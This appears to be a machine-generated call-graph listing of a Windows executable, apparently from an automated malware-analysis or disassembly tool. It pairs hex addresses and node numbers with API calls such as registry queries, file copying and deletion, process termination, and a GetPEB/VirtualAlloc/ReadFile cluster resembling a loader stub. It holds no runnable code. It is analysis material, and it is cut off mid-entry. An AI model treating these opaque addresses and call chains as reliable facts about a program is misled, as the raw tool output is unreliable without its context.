96672->96674 96673->96651 96694 336270 96674->96694 96677 373393 LoadStringW 96680 3733ad 96677->96680 96678 33395a 96679 336b57 22 API calls 96678->96679 96681 33396f 96679->96681 96684 33a8c7 22 API calls 96680->96684 96689 333994 ___scrt_fastfail 96680->96689 96682 3733c9 96681->96682 96683 33397c 96681->96683 96686 336350 22 API calls 96682->96686 96683->96680 96685 333986 96683->96685 96684->96689 96699 336350 96685->96699 96688 3733d7 96686->96688 96688->96689 96708 3333c6 96688->96708 96691 3339f9 Shell_NotifyIconW 96689->96691 96691->96673 96692 3733f9 96693 3333c6 22 API calls 96692->96693 96693->96689 96695 34fe0b 22 API calls 96694->96695 96696 336295 96695->96696 96697 34fddb 22 API calls 96696->96697 96698 33394d 96697->96698 96698->96677 96698->96678 96700 336362 96699->96700 96701 374a51 96699->96701 96717 336373 96700->96717 96727 334a88 22 API calls __fread_nolock 96701->96727 96704 33636e 96704->96689 96705 374a5b 96706 374a67 96705->96706 96707 33a8c7 22 API calls 96705->96707 96707->96706 96709 3730bb 96708->96709 96710 3333dd 96708->96710 96712 34fddb 22 API calls 96709->96712 96733 3333ee 96710->96733 96714 3730c5 _wcslen 96712->96714 96713 3333e8 96713->96692 96715 34fe0b 22 API calls 96714->96715 96716 3730fe __fread_nolock 96715->96716 96718 3363b6 __fread_nolock 96717->96718 96719 336382 96717->96719 96718->96704 96719->96718 96720 374a82 96719->96720 96721 3363a9 96719->96721 96723 34fddb 22 API calls 96720->96723 96728 33a587 96721->96728 96724 374a91 96723->96724 96725 34fe0b 22 API calls 96724->96725 96726 374ac5 __fread_nolock 96725->96726 96727->96705 96729 33a59d 96728->96729 96732 33a598 __fread_nolock 96728->96732 96730 34fe0b 22 API calls 96729->96730 96731 37f80f 96729->96731 96730->96732 96731->96731 96732->96718 96734 3333fe _wcslen 96733->96734 96735 333411 96734->96735 96736 37311d 96734->96736 96737 33a587 22 API calls 96735->96737 96738 34fddb 22 API calls 96736->96738 96739 33341e __fread_nolock 96737->96739 96740 373127 96738->96740 96739->96713 96741 34fe0b 22 API calls 96740->96741 96742 373157 __fread_nolock 96741->96742 96744 3735a4 96743->96744 96745 3338b7 96743->96745 96744->96745 96746 3735ad DestroyIcon 96744->96746 96745->96668 96747 39c874 42 API calls _strftime 96745->96747 96746->96745 96747->96668 96748 33105b 96753 33344d 96748->96753 96750 33106a 96784 3500a3 29 API calls __onexit 96750->96784 96752 331074 96754 33345d __wsopen_s 96753->96754 96755 33a961 22 API calls 96754->96755 96756 333513 96755->96756 96757 333a5a 24 API calls 96756->96757 96758 33351c 96757->96758 96785 333357 96758->96785 96761 3333c6 22 API calls 96762 333535 96761->96762 96763 33515f 22 API calls 96762->96763 96764 333544 96763->96764 96765 33a961 22 API calls 96764->96765 96766 33354d 96765->96766 96767 33a6c3 22 API calls 96766->96767 96768 333556 RegOpenKeyExW 96767->96768 96769 373176 RegQueryValueExW 96768->96769 96774 333578 96768->96774 96770 373193 96769->96770 96771 37320c RegCloseKey 96769->96771 96772 34fe0b 22 API calls 96770->96772 96771->96774 96783 37321e _wcslen 96771->96783 96773 3731ac 96772->96773 96775 335722 22 API calls 96773->96775 96774->96750 96776 3731b7 RegQueryValueExW 96775->96776 96778 3731d4 96776->96778 96780 3731ee messages 96776->96780 96777 334c6d 22 API calls 96777->96783 96779 336b57 22 API calls 96778->96779 96779->96780 96780->96771 96781 339cb3 22 API calls 96781->96783 96782 33515f 22 API calls 96782->96783 96783->96774 96783->96777 96783->96781 96783->96782 96784->96752 96786 371f50 __wsopen_s 96785->96786 96787 333364 GetFullPathNameW 96786->96787 96788 333386 96787->96788 96789 336b57 22 API calls 96788->96789 96790 3333a4 96789->96790 96790->96761 96791 eaf663 96794 eaf2d8 96791->96794 96793 eaf6af 96807 eacd08 96794->96807 96796 eaf377 96799 eaf3d1 VirtualAlloc 96796->96799 96804 eaf3b5 96796->96804 96805 eaf4d8 CloseHandle 96796->96805 96806 eaf4e8 VirtualFree 96796->96806 96810 eb01e8 GetPEB 96796->96810 96798 eaf3a8 CreateFileW 96798->96796 96798->96804 96800 eaf3f2 ReadFile 96799->96800 96799->96804 96803 eaf410 VirtualAlloc 96800->96803 96800->96804 96801 eaf5d2 96801->96793 96802 eaf5c4 VirtualFree 96802->96801 96803->96796 96803->96804 96804->96801 96804->96802 96805->96796 96806->96796 96812 eb0188 GetPEB 96807->96812 96809 ead393 96809->96796 96811 eb0212 96810->96811 96811->96798 96813 eb01b2 96812->96813 96813->96809 96814 331098 96819 3342de 96814->96819 96818 3310a7 96820 33a961 22 API calls 96819->96820 96821 3342f5 GetVersionExW 96820->96821 96822 336b57 22 API calls 96821->96822 96823 334342 96822->96823 96824 3393b2 22 API calls 96823->96824 96833 334378 96823->96833 96825 33436c 96824->96825 96827 3337a0 22 API calls 96825->96827 96826 33441b GetCurrentProcess IsWow64Process 96828 334437 96826->96828 96827->96833 96829 373824 GetSystemInfo 96828->96829 96830 33444f LoadLibraryA 96828->96830 96831 334460 GetProcAddress 96830->96831 96832 33449c GetSystemInfo 96830->96832 96831->96832 96835 334470 GetNativeSystemInfo 96831->96835 96836 334476 96832->96836 96833->96826 96834 3737df 96833->96834 96835->96836 96837 33109d 96836->96837 96838 33447a FreeLibrary 96836->96838 96839 3500a3 29 API calls __onexit 96837->96839 96838->96837 96839->96818 96840 3690fa 96841 369107 96840->96841 96844 36911f 96840->96844 96890 35f2d9 20 API calls __dosmaperr 96841->96890 96843 36910c 96891 3627ec 26 API calls _strftime 96843->96891 96846 36917a 96844->96846 96852 369117 96844->96852 96892 36fdc4 21 API calls 2 library calls 96844->96892 96848 35d955 __fread_nolock 26 API calls 96846->96848 96849 369192 96848->96849 96860 368c32 96849->96860 96851 369199 96851->96852 96853 35d955 __fread_nolock 26 API calls 96851->96853 96854 3691c5 96853->96854 96854->96852 96855 35d955 __fread_nolock 26 API calls 96854->96855 96856 3691d3 96855->96856 96856->96852 96857 35d955 __fread_nolock 26 API calls 96856->96857 96858 3691e3 96857->96858 96859 35d955 __fread_nolock 26 API calls 96858->96859 96859->96852 96861 368c3e CallCatchBlock 96860->96861 96862 368c46 96861->96862 96863 368c5e 96861->96863 96894 35f2c6 20 API calls __dosmaperr 96862->96894 96865 368d24 96863->96865 96870 368c97 96863->96870 96901 35f2c6 20 API calls __dosmaperr 96865->96901 96867 368c4b 96895 35f2d9 20 API calls __dosmaperr 96867->96895 96868 368d29 96902 35f2d9 20 API calls __dosmaperr 96868->96902 96872 368ca6 96870->96872 96873 368cbb 96870->96873 96896 35f2c6 20 API calls __dosmaperr 96872->96896 96893 365147 EnterCriticalSection 96873->96893 96875 368cb3 96903 3627ec 26 API calls _strftime 96875->96903 96877 368cc1 96879 368cf2 96877->96879 96880 368cdd 96877->96880 96878 368cab 96897 35f2d9 20 API calls __dosmaperr 96878->96897 96885 368d45 __fread_nolock 38 API calls 96879->96885 96898 35f2d9 20 API calls __dosmaperr 96880->96898 96882 368c53 __fread_nolock 96882->96851 96887 368ced 96885->96887 96886 368ce2 96899 35f2c6 20 API calls __dosmaperr 96886->96899 96900 368d1c LeaveCriticalSection __wsopen_s 96887->96900 96890->96843 96891->96852 96892->96846 96893->96877 96894->96867 96895->96882 96896->96878 96897->96875 96898->96886 96899->96887 96900->96882 96901->96868 96902->96875 96903->96882 96904 33f7bf 96905 33f7d3 96904->96905 96906 33fcb6 96904->96906 96907 33fcc2 96905->96907 96909 34fddb 22 API calls 96905->96909 96997 33aceb 23 API calls messages 96906->96997 96998 33aceb 23 API calls messages 96907->96998 96911 33f7e5 96909->96911 96911->96907 96912 33f83e 96911->96912 96913 33fd3d 96911->96913 96927 33ed9d messages 96912->96927 96939 341310 96912->96939 96999 3a1155 22 API calls 96913->96999 96916 384beb 97003 3a359c 82 API calls __wsopen_s 96916->97003 96917 34fddb 22 API calls 96921 33ec76 messages 96917->96921 96918 33fef7 96926 33a8c7 22 API calls 96918->96926 96918->96927 96921->96916 96921->96917 96921->96918 96922 384b0b 96921->96922 96923 384600 96921->96923 96921->96927 96928 33a8c7 22 API calls 96921->96928 96931 33a961 22 API calls 96921->96931 96932 33fbe3 96921->96932 96935 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96921->96935 96936 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96921->96936 96937 3500a3 29 API calls pre_c_initialization 96921->96937 96938 33f3ae messages 96921->96938 96995 3401e0 235 API calls 2 library calls 96921->96995 96996 3406a0 41 API calls messages 96921->96996 97001 3a359c 82 API calls __wsopen_s 96922->97001 96923->96927 96929 33a8c7 22 API calls 96923->96929 96926->96927 96928->96921 96929->96927 96931->96921 96932->96927 96933 384bdc 96932->96933 96932->96938 97002 3a359c 82 API calls __wsopen_s 96933->97002 96935->96921 96936->96921 96937->96921 96938->96927 97000 3a359c 82 API calls __wsopen_s 96938->97000 96940 341376 96939->96940 96941 3417b0 96939->96941 96942 341390 96940->96942 96943 386331 96940->96943 97137 350242 5 API calls __Init_thread_wait 96941->97137 97004 341940 96942->97004 97142 3b709c 235 API calls 96943->97142 96947 3417ba 96950 3417fb 96947->96950 96952 339cb3 22 API calls 96947->96952 96949 38633d 96949->96921 96954 386346 96950->96954 96956 34182c 96950->96956 96951 341940 9 API calls 96953 3413b6 96951->96953 96959 3417d4 96952->96959 96953->96950 96955 3413ec 96953->96955 97143 3a359c 82 API calls __wsopen_s 96954->97143 96955->96954 96979 341408 __fread_nolock 96955->96979 97139 33aceb 23 API calls messages 96956->97139 97138 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96959->97138 96960 386369 96960->96921 96961 341839 97140 34d217 235 API calls 96961->97140 96963 38636e 97144 3a359c 82 API calls __wsopen_s 96963->97144 96965 34152f 96967 34153c 96965->96967 96968 3863d1 96965->96968 96970 341940 9 API calls 96967->96970 97146 3b5745 54 API calls _wcslen 96968->97146 96971 341549 96970->96971 96976 341940 9 API calls 96971->96976 96982 3864fa 96971->96982 96972 34fddb 22 API calls 96972->96979 96973 341872 97141 34faeb 23 API calls 96973->97141 96974 34fe0b 22 API calls 96974->96979 96980 341563 96976->96980 96979->96960 96979->96961 96979->96963 96979->96965 96979->96972 96979->96974 96981 3863b2 96979->96981 97112 33ec40 96979->97112 96980->96982 96984 33a8c7 22 API calls 96980->96984 96986 3415c7 messages 96980->96986 97145 3a359c 82 API calls __wsopen_s 96981->97145 96982->96960 97147 3a359c 82 API calls __wsopen_s 96982->97147 96984->96986 96985 341940 9 API calls 96985->96986 96986->96960 96986->96973 96986->96982 96986->96985 96989 34167b messages 96986->96989 97014 3b958b 96986->97014 97017 39d4ce 96986->97017 97020 3af0ec 96986->97020 97029 3b959f 96986->97029 97032 3a6ef1 96986->97032 96987 34171d 96987->96921 96989->96987 97136 34ce17 22 API calls messages 96989->97136 96995->96921 96996->96921 96997->96907 96998->96913 96999->96927 97000->96927 97001->96927 97002->96916 97003->96927 97005 341981 97004->97005 97006 34195d 97004->97006 97148 350242 5 API calls __Init_thread_wait 97005->97148 97007 3413a0 97006->97007 97150 350242 5 API calls __Init_thread_wait 97006->97150 97007->96951 97010 34198b 97010->97006 97149 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97010->97149 97011 348727 97011->97007 97151 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97011->97151 97152 3b7f59 97014->97152 97016 3b959b 97016->96986 97285 39dbbe lstrlenW 97017->97285 97021 337510 53 API calls 97020->97021 97022 3af126 97021->97022 97290 339e90 97022->97290 97024 3af136 97025 3af15b 97024->97025 97026 33ec40 235 API calls 97024->97026 97028 3af15f 97025->97028 97318 339c6e 22 API calls 97025->97318 97026->97025 97028->96986 97030 3b7f59 120 API calls 97029->97030 97031 3b95af 97030->97031 97031->96986 97033 33a961 22 API calls 97032->97033 97034 3a6f1d 97033->97034 97035 33a961 22 API calls 97034->97035 97036 3a6f26 97035->97036 97037 3a6f3a 97036->97037 97479 33b567 39 API calls 97036->97479 97039 337510 53 API calls 97037->97039 97040 3a6f57 _wcslen 97039->97040 97041 3a70bf 97040->97041 97042 3a6fbc 97040->97042 97111 3a70e9 97040->97111 97044 334ecb 94 API calls 97041->97044 97043 337510 53 API calls 97042->97043 97045 3a6fc8 97043->97045 97046 3a70d0 97044->97046 97050 33a8c7 22 API calls 97045->97050 97053 3a6fdb 97045->97053 97047 3a70e5 97046->97047 97048 334ecb 94 API calls 97046->97048 97049 33a961 22 API calls 97047->97049 97047->97111 97048->97047 97051 3a711a 97049->97051 97050->97053 97052 33a961 22 API calls 97051->97052 97057 3a7126 97052->97057 97054 3a7027 97053->97054 97055 3a7005 97053->97055 97058 33a8c7 22 API calls 97053->97058 97056 337510 53 API calls 97054->97056 97059 3333c6 22 API calls 97055->97059 97060 3a7034 97056->97060 97061 33a961 22 API calls 97057->97061 97058->97055 97062 3a700f 97059->97062 97063 3a703d 97060->97063 97064 3a7047 97060->97064 97065 3a712f 97061->97065 97066 337510 53 API calls 97062->97066 97067 33a8c7 22 API calls 97063->97067 97480 39e199 GetFileAttributesW 97064->97480 97069 33a961 22 API calls 97065->97069 97071 3a701b 97066->97071 97067->97064 97070 3a7138 97069->97070 97074 337510 53 API calls 97070->97074 97075 336350 22 API calls 97071->97075 97072 3a7050 97073 3a7063 97072->97073 97076 334c6d 22 API calls 97072->97076 97078 337510 53 API calls 97073->97078 97084 3a7069 97073->97084 97077 3a7145 97074->97077 97075->97054 97076->97073 97328 33525f 97077->97328 97080 3a70a0 97078->97080 97481 39d076 57 API calls 97080->97481 97081 3a7166 97083 334c6d 22 API calls 97081->97083 97085 3a7175 97083->97085 97084->97111 97086 3a71a9 97085->97086 97087 334c6d 22 API calls 97085->97087 97088 33a8c7 22 API calls 97086->97088 97090 3a7186 97087->97090 97089 3a71ba 97088->97089 97091 336350 22 API calls 97089->97091 97090->97086 97093 336b57 22 API calls 97090->97093 97092 3a71c8 97091->97092 97094 336350 22 API calls 97092->97094 97095 3a719b 97093->97095 97096 3a71d6 97094->97096 97097 336b57 22 API calls 97095->97097 97098 336350 22 API calls 97096->97098 97097->97086 97099 3a71e4 97098->97099 97100 337510 53 API calls 97099->97100 97101 3a71f0 97100->97101 97370 39d7bc 97101->97370 97103 3a7201 97104 39d4ce 4 API calls 97103->97104 97105 3a720b 97104->97105 97106 337510 53 API calls 97105->97106 97109 3a7239 97105->97109 97107 3a7229 97106->97107 97424 3a2947 97107->97424 97110 334f39 68 API calls 97109->97110 97110->97111 97111->96986 97121 33ec76 messages 97112->97121 97113 350242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97113->97121 97114 3501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97114->97121 97115 384beb 97496 3a359c 82 API calls __wsopen_s 97115->97496 97116 34fddb 22 API calls 97116->97121 97117 33fef7 97125 33a8c7 22 API calls 97117->97125 97129 33ed9d messages 97117->97129 97120 384b0b 97494 3a359c 82 API calls __wsopen_s 97120->97494 97121->97113 97121->97114 97121->97115 97121->97116 97121->97117 97121->97120 97122 384600 97121->97122 97126 33a8c7 22 API calls 97121->97126 97121->97129 97130 33fbe3 97121->97130 97131 33a961 22 API calls 97121->97131 97133 3500a3 29 API calls pre_c_initialization 97121->97133 97135 33f3ae messages 97121->97135 97491 3401e0 235 API calls 2 library calls 97121->97491 97492 3406a0 41 API calls messages 97121->97492 97127 33a8c7 22 API calls 97122->97127 97122->97129 97125->97129 97126->97121 97127->97129 97129->96979 97130->97129 97132 384bdc 97130->97132 97130->97135 97131->97121 97495 3a359c 82 API calls __wsopen_s 97132->97495 97133->97121 97135->97129 97493 3a359c 82 API calls __wsopen_s 97135->97493 97136->96989 97137->96947 97138->96950 97139->96961 97140->96973 97141->96973 97142->96949 97143->96960 97144->96960 97145->96960 97146->96980 97147->96960 97148->97010 97149->97006 97150->97011 97151->97007 97190 337510 97152->97190 97156 3b844f 97254 3b8ee4 60 API calls 97156->97254 97159 3b845e 97160 3b846a 97159->97160 97161 3b828f 97159->97161 97178 3b7fd5 messages 97160->97178 97226 3b7e86 97161->97226 97162 337510 53 API calls 97182 3b8049 97162->97182 97167 3b82c8 97241 34fc70 97167->97241 97170 3b82e8 97247 3a359c 82 API calls __wsopen_s 97170->97247 97171 3b8302 97248 3363eb 22 API calls 97171->97248 97174 3b82f3 GetCurrentProcess TerminateProcess 97174->97171 97175 3b8281 97175->97156 97175->97161 97176 3b8311 97249 336a50 22 API calls 97176->97249 97178->97016 97179 3b832a 97189 3b8352 97179->97189 97250 3404f0 22 API calls 97179->97250 97180 3b84c5 97180->97178 97185 3b84d9 FreeLibrary 97180->97185 97182->97162 97182->97175 97182->97178 97245 39417d 22 API calls __fread_nolock 97182->97245 97246 3b851d 42 API calls _strftime 97182->97246 97183 3b8341 97251 3b8b7b 75 API calls 97183->97251 97185->97178 97189->97180 97252 3404f0 22 API calls 97189->97252 97253 33aceb 23 API calls messages 97189->97253 97255 3b8b7b 75 API calls 97189->97255 97191 337522 97190->97191 97192 337525 97190->97192 97191->97178 97213 3b8cd3 97191->97213 97193 33755b 97192->97193 97194 33752d 97192->97194 97195 3750f6 97193->97195 97197 33756d 97193->97197 97205 37500f 97193->97205 97256 3551c6 26 API calls 97194->97256 97259 355183 26 API calls 97195->97259 97257 34fb21 51 API calls 97197->97257 97198 33753d 97203 34fddb 22 API calls 97198->97203 97200 37510e 97200->97200 97206 337547 97203->97206 97204 375088 97258 34fb21 51 API calls 97204->97258 97205->97204 97208 34fe0b 22 API calls 97205->97208 97207 339cb3 22 API calls 97206->97207 97207->97191 97209 375058 97208->97209 97210 34fddb 22 API calls 97209->97210 97211 37507f 97210->97211 97212 339cb3 22 API calls 97211->97212 97212->97204 97214 33aec9 22 API calls 97213->97214 97215 3b8cee CharLowerBuffW 97214->97215 97260 398e54 97215->97260 97219 33a961 22 API calls 97220 3b8d2a 97219->97220 97267 336d25 97220->97267 97222 3b8d3e 97223 3393b2 22 API calls 97222->97223 97225 3b8d48 _wcslen 97223->97225 97224 3b8e5e _wcslen 97224->97182 97225->97224 97280 3b851d 42 API calls _strftime 97225->97280 97227 3b7eec 97226->97227 97228 3b7ea1 97226->97228 97232 3b9096 97227->97232 97229 34fe0b 22 API calls 97228->97229 97230 3b7ec3 97229->97230 97230->97227 97231 34fddb 22 API calls 97230->97231 97231->97230 97233 3b92ab messages 97232->97233 97240 3b90ba _strcat _wcslen 97232->97240 97233->97167 97234 33b6b5 39 API calls 97234->97240 97235 33b567 39 API calls 97235->97240 97236 33b38f 39 API calls 97236->97240 97237 337510 53 API calls 97237->97240 97238 35ea0c 21 API calls ___std_exception_copy 97238->97240 97240->97233 97240->97234 97240->97235 97240->97236 97240->97237 97240->97238 97284 39efae 24 API calls _wcslen 97240->97284 97243 34fc85 97241->97243 97242 34fd1d VirtualProtect 97244 34fceb 97242->97244 97243->97242 97243->97244 97244->97170 97244->97171 97245->97182 97246->97182 97247->97174 97248->97176 97249->97179 97250->97183 97251->97189 97252->97189 97253->97189 97254->97159 97255->97189 97256->97198 97257->97198 97258->97195 97259->97200 97261 398e74 _wcslen 97260->97261 97262 398f63 97261->97262 97265 398ea9 97261->97265 97266 398f68 97261->97266 97262->97219 97262->97225 97265->97262 97281 34ce60 41 API calls 97265->97281 97266->97262 97282 34ce60 41 API calls 97266->97282 97268 336d91 97267->97268 97269 336d34 97267->97269 97270 3393b2 22 API calls 97268->97270 97269->97268 97271 336d3f 97269->97271 97276 336d62 __fread_nolock 97270->97276 97272 336d5a 97271->97272 97273 374c9d 97271->97273 97283 336f34 22 API calls 97272->97283 97275 34fddb 22 API calls 97273->97275 97277 374ca7 97275->97277 97276->97222 97278 34fe0b 22 API calls 97277->97278 97279 374cda 97278->97279 97280->97224 97281->97265 97282->97266 97283->97276 97284->97240 97286 39dbdc GetFileAttributesW 97285->97286 97287 39d4d5 97285->97287 97286->97287 97288 39dbe8 FindFirstFileW 97286->97288 97287->96986 97288->97287 97289 39dbf9 FindClose 97288->97289 97289->97287 97291 336270 22 API calls 97290->97291 97316 339eb5 97291->97316 97292 339fd2 97320 33a4a1 22 API calls __fread_nolock 97292->97320 97294 339fec 97294->97024 97297 37f7c4 97325 3996e2 84 API calls __wsopen_s 97297->97325 97298 37f699 97305 34fddb 22 API calls 97298->97305 97300 33a405 97300->97294 97327 3996e2 84 API calls __wsopen_s 97300->97327 97303 33a6c3 22 API calls 97303->97316 97304 37f7d2 97326 33a4a1 22 API calls __fread_nolock 97304->97326 97306 37f754 97305->97306 97309 34fe0b 22 API calls 97306->97309 97308 37f7e8 97308->97294 97310 33a12c __fread_nolock 97309->97310 97310->97297 97310->97300 97312 33a587 22 API calls 97312->97316 97313 33aec9 22 API calls 97314 33a0db CharUpperBuffW 97313->97314 97321 33a673 22 API calls 97314->97321 97316->97292 97316->97297 97316->97298 97316->97300 97316->97303 97316->97310 97316->97312 97316->97313 97317 33a4a1 22 API calls 97316->97317 97319 334573 41 API calls _wcslen 97316->97319 97322 3348c8 23 API calls 97316->97322 97323 3349bd 22 API calls __fread_nolock 97316->97323 97324 33a673 22 API calls 97316->97324 97317->97316 97318->97028 97319->97316 97320->97294 97321->97316 97322->97316 97323->97316 97324->97316 97325->97304 97326->97308 97327->97294 97329 33a961 22 API calls 97328->97329 97330 335275 97329->97330 97331 33a961 22 API calls 97330->97331 97332 33527d 97331->97332 97333 33a961 22 API calls 97332->97333 97334 335285 97333->97334 97335 33a961 22 API calls 97334->97335 97336 33528d 97335->97336 97337 373df5 97336->97337 97338 3352c1 97336->97338 97339 33a8c7 22 API calls 97337->97339 97340 336d25 22 API calls 97338->97340 97342 373dfe 97339->97342 97341 3352cf 97340->97341 97343 3393b2 22 API calls 97341->97343 97344 33a6c3 22 API calls 97342->97344 97345 3352d9 97343->97345 97346 335304 97344->97346 97345->97346 97347 336d25 22 API calls 97345->97347 97348 335349 97346->97348 97349 335325 97346->97349 97366 373e20 97346->97366 97351 3352fa 97347->97351 97350 336d25 22 API calls 97348->97350 97349->97348 97355 334c6d 22 API calls 97349->97355 97352 33535a 97350->97352 97353 3393b2 22 API calls 97351->97353 97354 335370 97352->97354 97359 33a8c7 22 API calls 97352->97359 97353->97346 97358 335384 97354->97358 97362 33a8c7 22 API calls 97354->97362 97356 335332 97355->97356 97356->97348 97361 336d25 22 API calls 97356->97361 97357 336b57 22 API calls 97367 373ee0 97357->97367 97360 33538f 97358->97360 97363 33a8c7 22 API calls 97358->97363 97359->97354 97364 33a8c7 22 API calls 97360->97364 97368 33539a 97360->97368 97361->97348 97362->97358 97363->97360 97364->97368 97365 334c6d 22 API calls 97365->97367 97366->97357 97367->97348 97367->97365 97482 3349bd 22 API calls __fread_nolock 97367->97482 97368->97081 97371 39d7d8 97370->97371 97372 39d7dd 97371->97372 97373 39d7f3 97371->97373 97375 33a8c7 22 API calls 97372->97375 97423 39d7ee 97372->97423 97374 33a961 22 API calls 97373->97374 97376 39d7fb 97374->97376 97375->97423 97377 33a961 22 API calls 97376->97377 97378 39d803 97377->97378 97379 33a961 22 API calls 97378->97379 97380 39d80e 97379->97380 97381 33a961 22 API calls 97380->97381 97382 39d816 97381->97382 97383 33a961 22 API calls 97382->97383 97384 39d81e 97383->97384 97385 33a961 22 API calls 97384->97385 97386 39d826 97385->97386 97387 33a961 22 API calls 97386->97387 97388 39d82e 97387->97388 97389 33a961 22 API calls 97388->97389 97390 39d836 97389->97390 97391 33525f 22 API calls 97390->97391 97392 39d84d 97391->97392 97393 33525f 22 API calls 97392->97393 97394 39d866 97393->97394 97395 334c6d 22 API calls 97394->97395 97396 39d872 97395->97396 97397 39d885 97396->97397 97398 3393b2 22 API calls 97396->97398 97399 334c6d 22 API calls 97397->97399 97398->97397 97400 39d88e 97399->97400 97401 39d89e 97400->97401 97402 3393b2 22 API calls 97400->97402 97403 39d8b0 97401->97403 97404 33a8c7 22 API calls 97401->97404 97402->97401 97405 336350 22 API calls 97403->97405 97404->97403 97406 39d8bb 97405->97406 97483 39d978 22 API calls 97406->97483 97408 39d8ca 97484 39d978 22 API calls 97408->97484 97410 39d8dd 97411 334c6d 22 API calls 97410->97411 97412 39d8e7 97411->97412 97413 39d8ec 97412->97413 97414 39d8fe 97412->97414 97416 3333c6 22 API calls 97413->97416 97415 334c6d 22 API calls 97414->97415 97417 39d907 97415->97417 97418 39d8f9 97416->97418 97419 39d925 97417->97419 97420 3333c6 22 API calls 97417->97420 97421 336350 22 API calls 97418->97421 97422 336350 22 API calls 97419->97422 97420->97418 97421->97419 97422->97423 97423->97103 97425 3a2954 __wsopen_s 97424->97425 97426 34fe0b 22 API calls 97425->97426 97427 3a2971 97426->97427 97428 335722 22 API calls 97427->97428 97429 3a297b 97428->97429 97430 3a274e 27 API calls 97429->97430 97431 3a2986 97430->97431 97432 33511f 64 API calls 97431->97432 97433 3a299b 97432->97433 97434 3a29bf 97433->97434 97435 3a2a6c 97433->97435 97436 3a2e66 75 API calls 97434->97436 97437 3a2e66 75 API calls 97435->97437 97438 3a29c4 97436->97438 97452 3a2a38 97437->97452 97445 3a2a75 messages 97438->97445 97489 35d583 26 API calls 97438->97489 97440 3350f5 40 API calls 97441 3a2a91 97440->97441 97442 3350f5 40 API calls 97441->97442 97444 3a2aa1 97442->97444 97443 3a29ed 97490 35d583 26 API calls 97443->97490 97446 3350f5 40 API calls 97444->97446 97445->97109 97448 3a2abc 97446->97448 97449 3350f5 40 API calls 97448->97449 97450 3a2acc 97449->97450 97451 3350f5 40 API calls 97450->97451 97453 3a2ae7 97451->97453 97452->97440 97452->97445 97454 3350f5 40 API calls 97453->97454 97455 3a2af7 97454->97455 97456 3350f5 40 API calls 97455->97456 97457 3a2b07 97456->97457 97458 3350f5 40 API calls 97457->97458 97459 3a2b17 97458->97459 97485 3a3017 GetTempPathW GetTempFileNameW 97459->97485 97461 3a2b22 97462 35e5eb 29 API calls 97461->97462 97473 3a2b33 97462->97473 97463 3a2bed 97464 35e678 67 API calls 97463->97464 97465 3a2bf8 97464->97465 97467 3a2bfe DeleteFileW 97465->97467 97468 3a2c12 97465->97468 97466 3350f5 40 API calls 97466->97473 97467->97445 97469 3a2c91 CopyFileW 97468->97469 97475 3a2c18 97468->97475 97470 3a2cb9 DeleteFileW 97469->97470 97471 3a2ca7 DeleteFileW 97469->97471 97486 3a2fd8 CreateFileW 97470->97486 97471->97445 97473->97445 97473->97463 97473->97466 97474 35dbb3 65 API calls 97473->97474 97474->97473 97476 3a22ce 79 API calls 97475->97476 97477 3a2c7c 97476->97477 97477->97470 97478 3a2c80 DeleteFileW 97477->97478 97478->97445 97479->97037 97480->97072 97481->97084 97482->97367 97483->97408 97484->97410 97485->97461 97487 3a2fff SetFileTime CloseHandle 97486->97487 97488 3a3013 97486->97488 97487->97488 97488->97445 97489->97443 97490->97452 97491->97121 97492->97121 97493->97129 97494->97129 97495->97115 97496->97129 97497 383f75 97508 34ceb1 97497->97508 97499 383f8b 97501 384006 97499->97501 97575 34e300 23 API calls 97499->97575 97517 33bf40 97501->97517 97504 384052 97506 384a88 97504->97506 97577 3a359c 82 API calls __wsopen_s 97504->97577 97505 383fe6 97505->97504 97576 3a1abf 22 API calls 97505->97576 97509 34ced2 97508->97509 97510 34cebf 97508->97510 97512 34cf05 97509->97512 97513 34ced7 97509->97513 97578 33aceb 23 API calls messages 97510->97578 97579 33aceb 23 API calls messages 97512->97579 97514 34fddb 22 API calls 97513->97514 97516 34cec9 97514->97516 97516->97499 97580 33adf0 97517->97580 97519 33bf9d 97520 33bfa9 97519->97520 97521 3804b6 97519->97521 97523 3804c6 97520->97523 97524 33c01e 97520->97524 97599 3a359c 82 API calls __wsopen_s 97521->97599 97600 3a359c 82 API calls __wsopen_s 97523->97600 97585 33ac91 97524->97585 97527 3804f5 97529 38055a 97527->97529 97601 34d217 235 API calls 97527->97601 97528 397120 22 API calls 97572 33c039 __fread_nolock messages 97528->97572 97561 33c603 97529->97561 97602 3a359c 82 API calls __wsopen_s 97529->97602 97530 33c7da 97534 34fe0b 22 API calls 97530->97534 97538 33c808 __fread_nolock 97534->97538 97541 34fe0b 22 API calls 97538->97541 97539 33af8a 22 API calls 97539->97572 97540 38091a 97612 3a3209 23 API calls 97540->97612 97573 33c350 __fread_nolock messages 97541->97573 97542 34fddb 22 API calls 97542->97572 97545 33ec40 235 API calls 97545->97572 97546 3808a5 97547 33ec40 235 API calls 97546->97547 97548 3808cf 97547->97548 97548->97561 97610 33a81b 41 API calls 97548->97610 97550 380591 97603 3a359c 82 API calls __wsopen_s 97550->97603 97553 3808f6 97611 3a359c 82 API calls __wsopen_s 97553->97611 97556 33c237 97558 33c253 97556->97558 97560 33a8c7 22 API calls 97556->97560 97562 380976 97558->97562 97565 33c297 messages 97558->97565 97559 34fe0b 22 API calls 97559->97572 97560->97558 97561->97504 97613 33aceb 23 API calls messages 97562->97613 97567 3809bf 97565->97567 97596 33aceb 23 API calls messages 97565->97596 97567->97561 97614 3a359c 82 API calls __wsopen_s 97567->97614 97568 33c335 97568->97567 97569 33c342 97568->97569 97597 33a704 22 API calls messages 97569->97597 97570 33bbe0 40 API calls 97570->97572 97572->97527 97572->97528 97572->97529 97572->97530 97572->97538 97572->97539 97572->97540 97572->97542 97572->97545 97572->97546 97572->97550 97572->97553 97572->97556 97572->97559 97572->97561 97572->97567 97572->97570 97589 33ad81 97572->97589 97604 397099 22 API calls __fread_nolock 97572->97604 97605 3b5745 54 API calls _wcslen 97572->97605 97606 34aa42 22 API calls messages 97572->97606 97607 39f05c 40 API calls 97572->97607 97608 33a993 41 API calls 97572->97608 97609 33aceb 23 